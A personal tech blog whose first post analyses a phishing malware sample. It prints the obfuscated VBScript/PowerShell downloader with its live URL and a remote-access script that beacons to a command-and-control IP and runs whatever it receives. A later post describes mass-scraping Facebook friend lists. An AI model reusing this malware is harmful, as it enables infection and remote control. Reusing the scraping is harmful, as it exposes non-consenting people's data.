Quick analysis of a malware sample

I just received a spam e-mail impersonating the French social security ("Assurance Maladie"), telling me to download my tax statement, which they have graciously attached.

There are multiple things to notice here:

  • the sender address: [email protected]
  • onmicrosoft.com is used by Office 365 addresses, so they probably used Azure or something like that
  • the whole message is a picture, probably a screenshot of a real e-mail. Well, at least that way they don't write a fake message in broken Google-Translated French

Now, the attachments.

No PDF file this time, which is unusual given how common they are in this kind of spam. But rejoice! We have a VBScript file right there.

(the CSV file and the .bin file don't contain anything interesting, or at least I didn't find anything interesting in them)

Here is the VBS file, raw as I received it:

on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:JPHgjNP = replace("WiDDXetmcript.iDDXetmhEll","iDDXetm","s"):Set cfAKtQG = CreateObject(JPHgjNP ):izZHSpc = Replace("POWlZsTwIURSHlZsTwIULL","lZsTwIU","E"):WScript.Sleep 2000:WScript.Sleep 2000:cfAKtQGcfAKtQGNXPDFLW = "  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X":cfAKtQG.Run(izZHSpc+cfAKtQGcfAKtQGNXPDFLW+""),0,True:Set cfAKtQG = Nothing

Quite unreadable, if you ask me. Here it is after replacing every : with a line break, evaluating the replace( calls and merging all the strings together:

on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
WScript.Sleep 2000
WScript.Sleep 2000
CreateObject("Wscript.shEll").Run("POWERSHELL  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X"),0,True
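If you'd rather not do that clean-up by hand, both steps are easy to script. Here is a minimal sketch in Python (the function names are made up for illustration). It assumes the replace( calls only ever take three double-quoted literals, which holds for this sample but certainly not for every obfuscator, and it only splits on the colons that sit outside of string literals, so the :: and https:// inside the PowerShell payload are left alone:

```python
import re

# Matches VBScript calls such as replace("text","needle","replacement").
# Assumption: all three arguments are plain double-quoted literals.
REPLACE_CALL = re.compile(
    r'replace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)',
    re.IGNORECASE,
)


def eval_replace_calls(vbs: str) -> str:
    """Swap every literal replace(...) call for the quoted string it evaluates to."""
    def evaluate(match: re.Match) -> str:
        text, needle, replacement = match.groups()
        return '"' + text.replace(needle, replacement) + '"'

    return REPLACE_CALL.sub(evaluate, vbs)


def split_statements(vbs: str) -> list[str]:
    """Split a one-line script on ':' separators, ignoring colons inside strings."""
    statements, current, in_string = [], [], False
    for char in vbs:
        if char == '"':
            # A doubled quote ("") toggles twice, so the state stays correct.
            in_string = not in_string
        if char == ":" and not in_string:
            statements.append("".join(current).strip())
            current = []
        else:
            current.append(char)
    statements.append("".join(current).strip())
    return [statement for statement in statements if statement]
```

Calling split_statements(eval_replace_calls(raw_script)) on the raw one-liner gives one statement per list entry, with the two replace( calls already resolved to "Wscript.shEll" and "POWERSHELL". Merging the variables into the final Run( call is still done by hand.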

The VBScript sleeps for 4 seconds, then runs PowerShell with some weird code. Let's have a look at the PowerShell code:

$00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X

Let's remove all those <##>s and merge all those strings:

[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
$8ZRVUBH=I`E`X ('(New-Object Net.WebClient).DownloadString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')' -Join '')|I`E`X

Much more readable! So this just sleeps for about 7 seconds and then... it downloads a text file... and runs it? Let's have a look at the link.
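Before following that link: the PowerShell clean-up is just as mechanical as the VBScript one. The <##> markers are empty block comments and the backticks in I`E`X are escape characters that do nothing here, so both can simply be stripped. A rough sketch in Python, with hypothetical function names; the backtick removal is deliberately naive and would mangle real escape sequences such as a backtick followed by n, so treat it as good enough for this sample only:

```python
import re


def strip_noise(powershell: str) -> str:
    """Remove block comments (<# ... #>) and backticks from a PowerShell snippet."""
    without_comments = re.sub(r"<#.*?#>", "", powershell, flags=re.DOTALL)
    # Naive: assumes every backtick is junk, as in I`E`X.
    return without_comments.replace("`", "")


def extract_urls(powershell: str) -> list[str]:
    """Return the http(s) URLs found in the snippet, in order of appearance."""
    return re.findall(r"https?://[^\s'\"]+", powershell)
```

For example, strip_noise("I`E`X<##> 'x'") gives "IEX 'x'", and running extract_urls on the cleaned payload returns the single download URL. The string fragments still have to be joined by hand (or by a smarter script) to read the final command.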

upv.es is the official website of the Universitat Politècnica de València (Technical University of Valencia). webs.upv.es is the subdomain corresponding to the Web hosting service provided by the university. cursosinf.webs.upv.es corresponds, I can only guess, to the IT department of the school.

The website is empty at the time I'm writing:

But the file itself is still online, and looks like this:

try
{
$OutPath = "C:\ProgramData\Links"
if (-not (Test-Path $OutPath))
        {
            New-Item $OutPath -ItemType Directory -Force
        }

(New-Object Net.WebClient).DownloadFile('https://cursosinf.webs.upv.es/wp-includes//js/jcrop/1.txt', 'C:\ProgramData\Links\1.bat')
Start-Sleep 3
start C:\ProgramData\Links/1.bat

Start-Sleep 10

$Content = @'
<binary content>

This downloads a batch file which we'll analyse later.

Right now, it's creating an(other) VBS file (comments are mine):

On error resume next

Public IP, Port, SPL, A, StartupCheck

Set WshNetwork = CreateObject("Wscript.Network")
Set MyObject = CreateObject("Wscript.Shell")

' C&C (Command and Control server)
IP = "185.81.157.26"
Port = "5734"
StartupCheck = "True"
SPL = "|" & "V" & "|"

' Sends a synchronous HTTP POST request to the C&C server, with the INF string as User-Agent header
Function POST(ByVal DA, ByVal Param)
	On error resume next
	Dim MSXML, PO, HTTP, UserAgent
	MSXML = "Microsoft.XMLHTTP"
	PO = "POST"
	HTTP = "http://"
	UserAgent = "User-Agent:"
	
	Dim ResponseText
	Set ObjHTTP = CreateObject(MSXML)
	ObjHTTP.Open PO, HTTP & IP & ":" & Port & "/" & DA, False
	ObjHTTP.SetRequestHeader UserAgent, INF
	ObjHTTP.Send Param
	ResponseText = ObjHTTP.ResponseText
	POST = ResponseText
End Function

' Installs the current script in the Startup folder, so that it gets executed at each boot
Sub Installation()
If StartupCheck = "True" Then
	Set FSO = CreateObject("Scripting.FileSystemObject")
	FSO.CopyFile Wscript.ScriptFullName, MyObject.SpecialFolders("Startup") & "\Install32.vbs"
End If
End Sub

Call Installation

Function RandomString()
    Dim str, min, max
    Const LETTERS = "ABCDEFGHIJKLMOPQRSTVWXYZ0123456789"
    min = 1
    max = 15
    Randomize
    For i = 1 to 15
        str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
    Next
    RandomString = str
End Function

' Builds a hardware ID from the IdentifyingNumber (serial number) reported by WMI
' (note that the query itself only selects Version)
Function HWID
	Dim objWMIService, colItems, result
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("SELECT Version FROM Win32_ComputerSystemProduct")
	For Each objItem in colItems
		result = result & objItem.IdentifyingNumber
	Next
	HWID = result
End Function

' Generates a string with the format 
' \PCNAME\Account\Microsoft Windows 10 Professionnel\Windows Defender\Yes\Yes\FALSE\
Function INF
	Dim VR, AV, OS, PC, USER, ID
	VR = "v0.2"
	AV = "Windows Defender"
	PC = WshNetwork.ComputerName
	USER = WshNetwork.UserName
	ID = HWID
		
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem",,48)
	For Each objItem in colItems
		OS = OS + objItem.Caption
	Next
	INF = ID & "\" & PC & "\" & USER & "\" & OS & "\" & AV & "\" & "Yes" & "\" & "Yes" & "\" & "FALSE" & "\"
End Function

' Creates a file, fills it with the specified content
' If the extension is PS1, run it with PowerShell
' Otherwise, run it directly
Sub CreateEmptyFile(ByVal Content, ByVal Filename)
	Set FSO = CreateObject("Scripting.FileSystemObject")
	Set FileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(FSO.GetSpecialFolder(2) & "\" & Filename, 2, True)
	FileToWrite.WriteLine(Content)
	FileToWrite.Close
	Set FileToWrite = Nothing
	WScript.Sleep 2000
	If InStr(Filename, ".PS1") = 0 Then
		MyObject.RuN FSO.GetSpecialFolder(2) & "\" & Filename
	Else
		MyObject.ruN "POWERSHELL -EXECUTIONPOLICY REMOTESIGNED -FILE " + FSO.GetSpecialFolder(2) & "\" & Filename, 0
	End If
End Sub

' The interesting part!
' The main control loop
' This fetches, every 3 seconds, a "command" from the C&C server
' This is how the server "tells" the infected computer what to do
Do While True
	A = Split(POST("Vre", ""), SPL)
	Select Case A(0)
		' creates and runs a file with the given content and filename
		Case "RF"
			CreateEmptyFile A(1), A(2)
		' creates and runs a PowerShell file with the given content and a random filename
		Case "TR"
			CreateEmptyFile A(1), RandomString & ".PS1"
        ' stops the control script
		Case "Cl"
			Wscript.Quit
		' creates and runs a VBScript file with the given content and a random filename
		Case "exc"
			CreateEmptyFile A(1), RandomString & ".vbs"
        ' same as RF, no idea why they made two of them
		Case "Sc"
			CreateEmptyFile A(1), A(2)
        ' same as Cl
		Case "Un"
			Wscript.Quit
	End Select
	WScript.Sleep 3000
Loop

The VBS file is then saved and launched:

'@
Set-Content -Path C:\ProgramData\Links\install.vbs -Value $Content

Start-Sleep 3
start C:\ProgramData\Links\install.vbs

} catch { }

It's quite interesting how "simple" the virus is, really. At its core, it's just a loop that endlessly POSTs to a server and does something depending on the response.
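To make that protocol concrete, here is a small Python sketch of a decoder for server responses, the kind of thing you could run over captured traffic. The separator and the opcodes come straight from the script above; the function name and the wording of the descriptions are mine:

```python
SEPARATOR = "|V|"  # value of SPL in the VBS file

# Opcode -> what the control loop does with it, as read from the Select Case.
ACTIONS = {
    "RF": "write A(1) to the file named A(2) and run it",
    "TR": "write A(1) to a randomly named .PS1 file and run it with PowerShell",
    "Cl": "quit the control script",
    "exc": "write A(1) to a randomly named .vbs file and run it",
    "Sc": "write A(1) to the file named A(2) and run it",
    "Un": "quit the control script",
}


def decode_command(response: str) -> tuple[str, list[str], str]:
    """Split a raw response into (opcode, arguments, description)."""
    opcode, *arguments = response.split(SEPARATOR)
    # Opcodes are matched exactly, like the string comparison in Select Case.
    description = ACTIONS.get(opcode, "ignored (no matching Case)")
    return opcode, arguments, description
```

A response like "RF|V|<content>|V|<filename>" decodes to the opcode "RF" with two arguments, while anything that doesn't start with a known opcode falls through the Select Case and the loop just sleeps 3 seconds before asking again.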

Six handshakes away

Have you ever heard about "six degrees of separation"? It's the famous idea that there are always fewer than about six people between two individuals chosen at random in a population. Given enough people, you'll always find someone whose uncle's colleague has a friend who knows your next-door neighbour.

Fun fact: it's where the name of the long-forgotten social network sixdegrees.com came from.

Mathematically, it checks out. If you have 10 friends and each of those friends has 10 friends (you being one of them), in theory that's a total of 1+10+10*9=101 individuals. In practice, when you have 10 friends, they probably know each other as well, and their friends most probably do too. You end up with way fewer than 101 people, and no two people in your "social graph" ever end up more than one or two handshakes away from each other.
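The idealised count above generalises to any number of handshakes. As a quick sketch (a made-up helper, assuming the unrealistic case where nobody shares a single friend, i.e. the social graph is a tree):

```python
def max_reach(friends_per_person: int, handshakes: int) -> int:
    """Upper bound on the people within `handshakes` steps, yourself included,
    assuming no two people ever share a friend."""
    total = 1                      # you
    frontier = friends_per_person  # people exactly one handshake away
    for _ in range(handshakes):
        total += frontier
        # Everyone on the frontier brings all their friends except the
        # person we reached them through.
        frontier *= friends_per_person - 1
    return total
```

max_reach(10, 2) gives the 101 from above, and max_reach(10, 6) already gives 664301. Real friend lists are much longer than 10, which is why six steps are plenty even though overlapping friendships eat most of that theoretical growth.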

In graph theory, those kinds of graphs where you have densely connected communities, linked together by "hubs", i.e. high-degree nodes, are called "small-world networks".

Oh you know Bob? Isn't it a small world!

I learned about it a few weeks ago in a very nice (French) video on the subject, and immediately thought "I wonder what the graph of everyone I know looks like". Obviously, I can't exhaustively list every single person I've met in my life and put them on a graph.

Or can I?


One of the few good things™ Facebook gave us is really fast access to petabytes of data about people we know, and especially about our relationships with them. I can open up my childhood best friend's profile page and see everyone he's "friends" with, then click on a random person and see who they're friends with, et cætera. So I started looking for the documentation of Facebook's public API which, obviously, exists and allows looking up this kind of information. I quickly learned that the exact API I was looking for didn't exist anymore, and all of the "alternative" options (Web scrapers) I found were either partially or completely broken.

So I opened up PyCharm and started working on my own scraper, which would simply open Facebook in a Chromium WebDriver instance and fetch data using ugly XPath queries.

def query(tab):
    return "//span[text() = '" + tab + "']/ancestor::div[contains(@style, 'border-radius: max(0px, min(8px, ((100vw')]/div[1]/div[3]/div"
Truly horrible.

After 180 lines and some testing, I had something that worked.

Basically, the script loads a Facebook account's friends list page and scrolls to the bottom, waiting for the list to dynamically load until the end, and then fetches all the links in a specific <div>, each of which conveniently contains the ID of a friend. It then adds all of those IDs to the stored graph, iterates through them and repeats the whole process. It's a BFS (breadth-first search) over webpages.
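Stripped of all the Selenium plumbing, the crawl boils down to something like the sketch below. This is not the actual scraper: fetch_friends is a stand-in for "load the friends page, scroll, collect the IDs", and max_accounts is a hypothetical safety limit I added so the example terminates.

```python
from collections import deque
from typing import Callable, Iterable


def crawl(
    start_id: str,
    fetch_friends: Callable[[str], Iterable[str]],
    max_accounts: int,
) -> dict[str, list[str]]:
    """Breadth-first crawl; returns the friends list of each visited account."""
    graph: dict[str, list[str]] = {}
    queue = deque([start_id])
    queued = {start_id}  # IDs already waiting or visited, to avoid re-queuing
    while queue and len(graph) < max_accounts:
        account = queue.popleft()
        friends = list(fetch_friends(account))
        graph[account] = friends
        for friend in friends:
            if friend not in queued:
                queued.add(friend)
                queue.append(friend)
    return graph
```

Because the queue is first-in first-out, all of the starting account's friends are visited before any friend of a friend, which is what makes it breadth-first. An account whose friends list can't be read would simply come back with an empty list.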

In the past few years, a lot of people started realizing just how much stuff they were giving away publicly on their Facebook profile, and consequently made great use of the privacy settings that allow, for example, restricting who can see your friends list. A small step for man, but a giant leap in breaking my scraper. People with a private friends list appear on the graph as leaves, i.e. nodes that only have one neighbour. I ignore those nodes while processing the graph.
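Ignoring those leaves is a simple filter. A minimal sketch, assuming the scraped data is a dict mapping each visited account ID to the list of friend IDs found on its page (the function names are hypothetical, and this is a single pass, so nodes that become leaves after the pruning are kept):

```python
def to_undirected(friend_lists: dict[str, list[str]]) -> dict[str, set[str]]:
    """Turn per-account friend lists into symmetric neighbour sets."""
    neighbours: dict[str, set[str]] = {}
    for account, friends in friend_lists.items():
        neighbours.setdefault(account, set())
        for friend in friends:
            if friend == account:
                continue  # ignore self-links, just in case
            neighbours[account].add(friend)
            neighbours.setdefault(friend, set()).add(account)
    return neighbours


def drop_leaves(neighbours: dict[str, set[str]]) -> dict[str, set[str]]:
    """Remove nodes with at most one neighbour, and every edge pointing to them."""
    leaves = {node for node, adjacent in neighbours.items() if len(adjacent) <= 1}
    return {
        node: adjacent - leaves
        for node, adjacent in neighbours.items()
        if node not in leaves
    }
```

An account with a private friends list never gets an entry of its own in the scraped data; it only shows up inside other people's lists, so after to_undirected it has exactly one neighbour per account that listed it.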

The scraper stores the relationships as adjacency lists in a huge JSON file (74 MiB as I'm writing), which is then converted to GEXF using NetworkX.

Now in possession of a real graph, I can fire up Gephi and start analyzing stuff.


The graph you're seeing contains around 1 million nodes, each node corresponding to a Facebook account and each edge meaning two accounts are friends. The nodes and edges are colored according to their modularity class (fancy name for the virtual "community" or "cluster" they belong to), which was computed automatically using equally fancy graph-theoretical algorithms.

At 1 million nodes, the time necessary to lay out the graph and compute the useful measurements is about 60 hours (most of which is spent on calculating the centrality for each node) on my 4th-gen i7 machine.

About those small-world networks. One of their most remarkable properties is that the average length of the shortest path between two nodes chosen at random grows proportionally to the logarithm of the total number of nodes. In other words, even with huge graphs, you'll usually get unexpectedly short paths between nodes.

But what does that mean in practice? On this graph, there are people from dozens of different places where I've lived, studied, worked. Despite that, my dad living near Switzerland is only three handshakes away from my colleagues on the other side of the country.

More formally, the above graph has a diameter of 7. That means that no two nodes on the graph are more than 7 edges apart, so there are never more than 6 intermediaries between two people.

In the figure above, we can see the cumulative distribution of degrees on the graph. For a given number N, the curve shows us how many individuals have N or more friends. Intuitively, the curve is monotonically decreasing, because as N gets bigger and bigger, there are fewer and fewer people having that many friends. On the other hand, almost everyone has at least 1 friend.

You may notice a steep hill at the end, around N=5000. This is because 5000 is the maximum number of friends you can have on Facebook, so many people end up with a number of friends very close to it simply because they've "filled up" their friends list.
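For reference, the cumulative distribution described above is cheap to compute from the graph. A small sketch, assuming the graph is held as a dict mapping each node to the set of its neighbours (the function name is mine, and the real figure came out of Gephi, not out of this code):

```python
from collections import Counter


def cumulative_degree_distribution(neighbours: dict[str, set[str]]) -> dict[int, int]:
    """Map each N from 1 to the maximum degree to the number of nodes
    that have N or more neighbours."""
    counts = Counter(len(adjacent) for adjacent in neighbours.values())
    max_degree = max(counts, default=0)
    distribution: dict[int, int] = {}
    running = 0
    # Walk down from the largest degree, accumulating as we go.
    for n in range(max_degree, 0, -1):
        running += counts.get(n, 0)
        distribution[n] = running
    return dict(sorted(distribution.items()))
```

The running total can only grow as N goes down, which is exactly why the curve is monotonically decreasing when read from left to right.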

We can enumerate all pairs of individuals on the graph and compute the length of the shortest path between the two, which gives the following figure:

In this graph, the average distance between individuals is 3.3, which is slightly lower than the one found in the Facebook paper (4.7). This can be explained by the fact that the researchers had access to the entire Facebook database whereas I only have access to the graph I obtained through scraping.
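The pairwise computation itself is nothing more than one breadth-first search per node. Here is a sketch in plain Python, assuming a connected-or-not graph stored as a dict of neighbour sets in which every node appears as a key (function names are hypothetical). It is fine for toy graphs, but far too slow for a million nodes, where a dedicated tool is the way to go:

```python
from collections import Counter, deque


def distances_from(source: str, neighbours: dict[str, set[str]]) -> dict[str, int]:
    """Shortest-path length (in edges) from source to every reachable node."""
    distance = {source: 0}
    queue = deque([source])
    while queue:
        node = queue.popleft()
        for adjacent in neighbours[node]:
            if adjacent not in distance:
                distance[adjacent] = distance[node] + 1
                queue.append(adjacent)
    return distance


def distance_histogram(neighbours: dict[str, set[str]]) -> Counter:
    """Count unordered pairs of connected nodes by shortest-path length."""
    histogram: Counter = Counter()
    for source in neighbours:
        for target, length in distances_from(source, neighbours).items():
            if source < target:  # count each unordered pair only once
                histogram[length] += 1
    return histogram


def average_and_diameter(histogram: Counter) -> tuple[float, int]:
    """Average distance over connected pairs, and the longest distance found."""
    pairs = sum(histogram.values())
    average = sum(length * count for length, count in histogram.items()) / pairs
    return average, max(histogram)
```

The histogram is the data behind a figure like the one above, the average is the number compared with the Facebook paper, and the largest key is the diameter.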

The Facebook paper: "The Anatomy of the Facebook Social Graph" (PDF)

Fix for the Psy-Q Saturn SDK

If you ever want to write code for the Sega Saturn using the Psy-Q SDK (available here), you may encounter a small problem with the toolset when using #include directives.

Example:

#include "abc.h"

int main()
{
    int b = a + 43;
    return 0;
}
main.c

C:\Psyq\bin>ccsh -ITHING/ -S main.c
build.bat

int a = 98;
abc.h

This fails with the following error: main.c:1: abc.h: No such file or directory, which is quite strange given that we explicitly told the compiler to look in that THING folder.

What we have:

  • CCSH.EXE : main compiler executable (C Compiler Super-H)
  • CPPSH.EXE : preprocessor (C PreProcessor Super-H)

CCSH first calls CPPSH on the source file to get preprocessed code, and then actually compiles it. Running CPPSH alone still triggers the error, which means the problem really comes from CPPSH. After a thorough analysis in IDA, it seems that even though the code that parses the command-line parameters related to include directories is there, those paths aren't added to the program's internal directory array and are thus never used. I could have decompiled it and fixed it myself, but I found a faster and simpler way: use the PSX one.

Though CCSH and CCPSX are very different in nature (one compiles for Super-H and one for MIPS), their preprocessors are actually almost identical. When we think about it, it makes sense: the C language doesn't depend on the underlying architecture (most of the time), so why would its preprocessor?

So here's the fix: rename CPPSH to something else and copy the PSX preprocessor in its place, under the name CPPSH. Solves all problems and finally allows compiling C code for the Sega Saturn on Windows (the only other working SDK on the Internet is for DOS, which requires using DOSBox and 8.3 filenames, which makes big projects complicated to organize).

That's nice and all but can we compile actual code? Seems that the answer is no. Here is a basic file:

#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%d\n", 42);

	return 0;
}

Compiling this will give the following error:

In file included from bin/main.c:2:
D:\SATURN\INCLUDE\stdlib.h:7: conflicting types for 'size_t'
D:\SATURN\INCLUDE\stddef.h:166: previous declaration of 'size_t'

Weird, eh?

It seems that the STDLIB.H file in the SDK is somehow wrong, in that it has the following at the top:

#ifndef	__SIZE_TYPE__DEF
#define	__SIZE_TYPE__DEF	unsigned int
typedef	__SIZE_TYPE__DEF	size_t;
#endif
STDLIB.H

Whereas its friend STDDEF.H looks like this:

#ifndef __SIZE_TYPE__
#define __SIZE_TYPE__ long unsigned int
#endif
#if !(defined (__GNUG__) && defined (size_t))
typedef __SIZE_TYPE__ size_t;
#endif /* !(defined (__GNUG__) && defined (size_t)) */
STDDEF.H

Two incompatible declarations, the compiler dies. The simple fix is to remove the DEF at the end of the names in STDLIB.H, to get something like this:

#ifndef	__SIZE_TYPE__
#define	__SIZE_TYPE__	unsigned int
typedef	__SIZE_TYPE__	size_t;
#endif
STDLIB.H

Solving bizarre hard drive corruption issues

I've recently encountered some pretty weird problems with my two USB3 external hard drives: a disk disconnects when I open specific files, then refuses to reconnect to that computer until I plug it into another computer, after which it works again, and so on.

Then I started noticing a pattern. The files that trigger the crash are always files that I have opened on another computer with that hard drive, which should give you a clue about what is going on.

It seems that there's a bug in Windows' drive ejection system. If you plug a hard drive into a computer, open a file in any software that keeps the descriptor open all the time (I'm looking at you, IDA Pro), and then eject the drive without closing the software first (which sometimes happens), the file will somehow still be marked as open in the NTFS attributes. When you then try to open it on another computer, Windows will flip out and disconnect the hard drive. From then on, that second computer refuses to read the drive and shows it as RAW in the management console, even under another OS (I tried Ubuntu and FreeBSD), until you plug the HDD back into the first computer. Once you do, it magically unlocks and works again on all computers. This took me about a week to figure out; I hope this helps you figure it out faster than I did.

TOMB5 - Feb'19 status update

The project has come a long way since June of 2017.

Since the beginning of the project, the codebase has been divided into two separate branches: PC and PSX, which share a common "GAME" folder which contains the platform-independent game logic code.

More progress has been made on the PSX version since a lot of code is plain old MIPS assembly which we haven't had to decompile to C, so the PC version is still lagging behind. Problems with the old DirectX version used by the game (DX5) make all of this much harder.

Also, debugging the PSX version has always been a pain in the ass because of the need to run it in an emulator (we've used no$psx most of the time).

To solve that problem, we've started working on what we call the Emulator, which is, simply put, an implementation of the PSY-Q PSX SDK acting as an HLE emulator for the game. That way, we can debug the game directly in VS, which is much appreciated. We simply need to link the game binary against our emulator DLL instead of the standard PSY-Q libs. The emulator is based on SDL for windowing and OpenGL for 3D rendering.

Behold, pics.

Title screen
Secret cutscene menu used for debugging purposes, only reachable through RAM editing
Internal beta title screen
Game load screen
Level loading screen

You can check the code out on GitHub.